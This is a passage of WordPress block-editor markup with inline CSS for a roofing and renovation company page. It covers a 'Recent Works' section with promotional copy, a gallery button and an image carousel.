style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"c08eb779-6b23-4375-9566-02facfaefe08\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-c08eb779-6b23-4375-9566-02facfaefe08 background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c08eb779-6b23-4375-9566-02facfaefe08 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c08eb779-6b23-4375-9566-02facfaefe08 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c08eb779-6b23-4375-9566-02facfaefe08 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-c08eb779-6b23-4375-9566-02facfaefe08.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c08eb779-6b23-4375-9566-02facfaefe08.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-c08eb779-6b23-4375-9566-02facfaefe08.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c08eb779-6b23-4375-9566-02facfaefe08.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c08eb779-6b23-4375-9566-02facfaefe08.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-c08eb779-6b23-4375-9566-02facfaefe08 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-c08eb779-6b23-4375-9566-02facfaefe08 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-c08eb779-6b23-4375-9566-02facfaefe08.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-c08eb779-6b23-4375-9566-02facfaefe08 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-c08eb779-6b23-4375-9566-02facfaefe08.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-c08eb779-6b23-4375-9566-02facfaefe08 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-c08eb779-6b23-4375-9566-02facfaefe08.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2486de42-b273-4a51-9928-a440d7c1b1c0\"} -->\n<style type=\"text/css\"> .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2486de42-b273-4a51-9928-a440d7c1b1c0 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2486de42-b273-4a51-9928-a440d7c1b1c0 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"5b1bbca7-d8a6-410e-9938-8c2aba09ac7e\"} -->\n<style type=\"text/css\"> .block-5b1bbca7-d8a6-410e-9938-8c2aba09ac7e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5b1bbca7-d8a6-410e-9938-8c2aba09ac7e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5b1bbca7-d8a6-410e-9938-8c2aba09ac7e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5b1bbca7-d8a6-410e-9938-8c2aba09ac7e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5b1bbca7-d8a6-410e-9938-8c2aba09ac7e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5b1bbca7-d8a6-410e-9938-8c2aba09ac7e\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"6951b520-33f7-490d-80a1-79a6abafc6c5\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-6951b520-33f7-490d-80a1-79a6abafc6c5 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-6951b520-33f7-490d-80a1-79a6abafc6c5\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"3a50b7e6-9fb0-49b0-8c94-855e1986064f\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3a50b7e6-9fb0-49b0-8c94-855e1986064f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"6e1e3787-2786-48b9-9450-245e55848230\"} -->\n<style type=\"text/css\"> .block-6e1e3787-2786-48b9-9450-245e55848230 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6e1e3787-2786-48b9-9450-245e55848230 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6e1e3787-2786-48b9-9450-245e55848230 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6e1e3787-2786-48b9-9450-245e55848230 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6e1e3787-2786-48b9-9450-245e55848230 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6e1e3787-2786-48b9-9450-245e55848230\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"23e8ff91-9a36-4c8d-80fc-f0241f898d14\"} -->\n<style type=\"text/css\"> .block-id-23e8ff91-9a36-4c8d-80fc-f0241f898d14 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-23e8ff91-9a36-4c8d-80fc-f0241f898d14 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-23e8ff91-9a36-4c8d-80fc-f0241f898d14 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-23e8ff91-9a36-4c8d-80fc-f0241f898d14 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"cacf9427-8d74-4207-8a17-11a8e9454822\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-cacf9427-8d74-4207-8a17-11a8e9454822 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-cacf9427-8d74-4207-8a17-11a8e9454822 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-cacf9427-8d74-4207-8a17-11a8e9454822 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-cacf9427-8d74-4207-8a17-11a8e9454822 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-cacf9427-8d74-4207-8a17-11a8e9454822.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-cacf9427-8d74-4207-8a17-11a8e9454822.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-cacf9427-8d74-4207-8a17-11a8e9454822.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-cacf9427-8d74-4207-8a17-11a8e9454822.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-cacf9427-8d74-4207-8a17-11a8e9454822.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-cacf9427-8d74-4207-8a17-11a8e9454822 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-cacf9427-8d74-4207-8a17-11a8e9454822 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-cacf9427-8d74-4207-8a17-11a8e9454822.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-cacf9427-8d74-4207-8a17-11a8e9454822 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-cacf9427-8d74-4207-8a17-11a8e9454822.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-cacf9427-8d74-4207-8a17-11a8e9454822 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-cacf9427-8d74-4207-8a17-11a8e9454822.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading 